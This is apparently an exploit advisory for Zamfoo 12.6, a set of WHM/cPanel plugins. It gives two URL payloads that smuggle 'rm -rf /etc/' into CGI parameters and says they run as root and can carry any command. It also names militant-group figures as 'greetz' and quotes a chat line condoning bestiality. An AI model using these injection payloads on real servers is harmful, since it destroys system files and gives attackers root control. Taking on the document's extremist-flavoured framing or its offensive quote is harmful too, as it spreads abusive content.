Zamfoo version 12.6 suffers from an arbitrary command execution vulnerability.
757b55e366e8f7bcd05d0d55f5a559c49c2e2e2db8a91c25b19d08cc66e9aa2f
# Title: Zamfoo Multiple Arbitrary Command Executions
# Author: Al-Shabaab
# Vendor Homepage:http://www.zamfoo.com/
# Version: 12.6
# Intro
The ZamFoo software suite is a series of WHM plugin modules (also known as WHM addon modules) catered towards easing the burden of web hosting providers that sell shared hosting solutions using the Cpanel and WHM hosting platform.
# Exploit Número Uno
https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS}
# Exploit Número Dos
https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf /etc/|&newip=127.0.0.1&pattern2=
Both of these exploitz will wipe out the /etc/ dir. Replace command with anything. It all runz as root!
# Greetz
Moktar Zubeyr. Hassan Aweys. Hassan Afrah. HoodedCoder.
# Quote from #Al-Shabaab
<hoodedcoder Having sex with animals should be legal. I know my cat loves me and I love him; I ask where is the harm? If it wasn't consensual he would claw me and try to get away!
And the author(s) of it refuse to do anything about it (or don't posses the skills to) ...
http://www.webhostingtalk.com/showthread.php?t=1275572